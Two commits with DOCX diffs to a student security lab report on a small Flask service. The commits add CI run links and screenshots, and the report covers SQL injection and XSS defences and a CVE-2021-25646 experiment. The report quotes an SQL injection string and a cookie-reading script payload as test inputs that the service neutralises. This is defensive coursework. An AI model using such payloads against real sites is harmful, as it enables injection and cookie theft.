<commit_message>
Add CI evidence from the green run and link it from README and report
- 01-ci-green.png: Actions run 39367332876, all nine steps green
- 02/03: bandit artifact and pip-audit step taken from that run
- 09-repo.png: public repository page
- README and report appendix now link the run
</commit_message>
<xml_diff>
--- a/report/Lab1_Report_Work1.docx
+++ b/report/Lab1_Report_Work1.docx
@@ -3057,6 +3057,18 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The run that validated this submission is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>https://github.com/kanloner/information_security/actions/runs/39367332876</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (commit c36ed02): all nine steps - checkout, Python setup, dependency install, bandit, pip-audit, pytest and the artifact upload - finished green in 35 seconds. The two panels below are taken from that run rather than from a local terminal.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
       </w:pPr>
@@ -3067,17 +3079,55 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="60" w:after="160"/>
+        <w:spacing w:before="120" w:after="40"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:drawing>
+          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5577840" cy="3298894"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="01-ci-green.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5577840" cy="3298894"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[Screenshot placeholder] GitHub Actions: all steps green (screenshot 01)</w:t>
+          <w:color w:val="595959"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure. GitHub Actions run 39367332876: all nine steps green (SAST, SCA and the test suite)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4493,7 +4543,7 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>https://github.com/kanloner/information_security/actions</w:t>
+              <w:t>https://github.com/kanloner/information_security/actions/runs/39367332876</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4565,11 +4615,7 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">.github/workflows/ci.yml</w:t>
+              <w:t>.github/workflows/ci.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>

</xml_diff>

<commit_message>
Rewrite the CVE half of the report around CVE-2021-25646 and embed the figures
Sections 7-12 still described Grafana CVE-2021-43798, a different vulnerability
from the one shipped in the repository, so the conclusion argued about work that
was not done. They now follow the Druid experiment end to end, the CI section
quotes the real run, and the builder embeds the eleven screenshots instead of
writing placeholders.
</commit_message>
<xml_diff>
--- a/report/Lab1_Report_Work1.docx
+++ b/report/Lab1_Report_Work1.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
   <w:body>
     <w:p>
       <w:pPr>
@@ -57,7 +57,11 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Variant No.:  CVE-2021-25646</w:t>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Variant No.:  CVE-2021-25646</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -84,6 +88,19 @@
           <w:szCs w:val="22"/>
         </w:rPr>
         <w:t xml:space="preserve">HDU number:  23320330</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="1200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Group:  ____________________</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -151,7 +168,198 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">The service is written in Python 3.11+ with Flask 3 and stores data in SQLite through the standard sqlite3 module. This choice keeps the whole backend in a single readable file (app.py, about 240 lines), which makes the security review of the code straightforward for the reader, while still using the same primitives that a production stack would use: a real password hash function, a real JWT library, and parameterised SQL.</w:t>
+        <w:t xml:space="preserve">The service is written in Python 3.11+ with Flask 3 and stores data in SQLite through the standard sqlite3 module. The backend is deliberately small: three source files, about 290 lines in total, and no framework beyond Flask, which makes the security review of the code straightforward for the reader while still using the same primitives that a production stack would use - a real password hash function, a real JWT library and parameterised SQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="60" w:type="dxa"/>
+          <w:left w:w="100" w:type="dxa"/>
+          <w:bottom w:w="60" w:type="dxa"/>
+          <w:right w:w="100" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2400"/>
+        <w:gridCol w:w="6670"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2400" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">File</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6670" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Responsibility</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2400" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">app.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6670" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the three HTTP handlers, the JWT guard and the response headers</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2400" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">init_db.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6670" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">schema, connection factory, bcrypt hashing, demo seed data</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2400" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">create_user.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6670" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">offline account CLI - accounts are never created over HTTP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="80"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The split is not cosmetic. It keeps the request-handling code small enough to review line by line, it gives the static analyser three real source files instead of one monolith, and it removes the registration route that would otherwise be the most attractive target in the service: an account can only be created by someone who already has shell access.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -287,7 +495,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">single file, minimal ceremony</w:t>
+              <w:t xml:space="preserve">small surface, minimal ceremony</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -586,6 +794,64 @@
       <w:r>
         <w:rPr/>
         <w:t xml:space="preserve">The repository is public on GitHub and contains the application, the test suite, the pipeline definition, the scripts and configuration files for the vulnerable environment, and the patched configuration (see Appendix A).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="2662714"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="image1.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId101"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="2662714"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Public repository page: README, sources, pipeline and fixes (screenshot 09)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1489,180 +1755,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
         <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="1352494"/>
-            <wp:docPr id="1" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic>
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic>
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="08a-sqli.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId3"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="1352494"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect"/>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="200"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure 1. SQL injection payload ?q=' OR 1=1-- is treated as a literal search term and returns an empty array</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:before="200" w:after="100"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">4.2 Protection against XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Content is stored exactly as the user typed it and encoded at the moment it is returned. Escaping on output is the correct layer for this defence: the same value may later be rendered into HTML, into a log file or into a PDF, and only the output context knows which encoding is appropriate. Escaping on input would corrupt the stored data and would still be insufficient for contexts other than HTML.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">return jsonify(</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    [{key: html.escape(str(row[key])) for key in row.keys()} for row in rows]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">A stored payload therefore comes back neutralised - the browser receives text, not markup:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">body: "&lt;script&gt;alert(document.cookie)&lt;/script&gt;"     (stored)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">body: "&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;"   (returned)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">Defence in depth is added at the transport level: the response declares Content-Type: application/json, X-Content-Type-Options: nosniff and a Content-Security-Policy of default-src 'none', so even a client that misuses the payload cannot execute it as script.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="40"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5577840" cy="1402047"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="1382115"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="2" name="Picture 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -1671,11 +1771,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="08b-xss.png"/>
+                    <pic:cNvPr id="2" name="image2.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId102"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1683,9 +1783,11 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5577840" cy="1402047"/>
+                      <a:ext cx="5700000" cy="1382115"/>
                     </a:xfrm>
-                    <a:prstGeom prst="rect"/>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -1696,16 +1798,188 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="200"/>
+        <w:spacing w:before="0" w:after="200"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
-          <w:color w:val="595959"/>
-          <w:sz w:val="17"/>
-        </w:rPr>
-        <w:t>Figure 2. A stored &lt;script&gt; payload comes back HTML-escaped: &amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;</w:t>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SQL injection attempt returns an empty array (screenshot 08a)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:before="200" w:after="100"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">4.2 Protection against XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Content is stored exactly as the user typed it and encoded at the moment it is returned. Escaping on output is the correct layer for this defence: the same value may later be rendered into HTML, into a log file or into a PDF, and only the output context knows which encoding is appropriate. Escaping on input would corrupt the stored data and would still be insufficient for contexts other than HTML.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">return jsonify(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    [{key: html.escape(str(row[key])) for key in row.keys()} for row in rows]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">A stored payload therefore comes back neutralised - the browser receives text, not markup:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">body: "&lt;script&gt;alert(document.cookie)&lt;/script&gt;"     (stored)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">body: "&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;"   (returned)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Defence in depth is added at the transport level: the response declares Content-Type: application/json, X-Content-Type-Options: nosniff and a Content-Security-Policy of default-src 'none', so even a client that misuses the payload cannot execute it as script.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="1432752"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="3" name="image3.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId103"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="1432752"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Stored XSS payload returned in escaped form (screenshot 08b)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2282,7 +2556,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
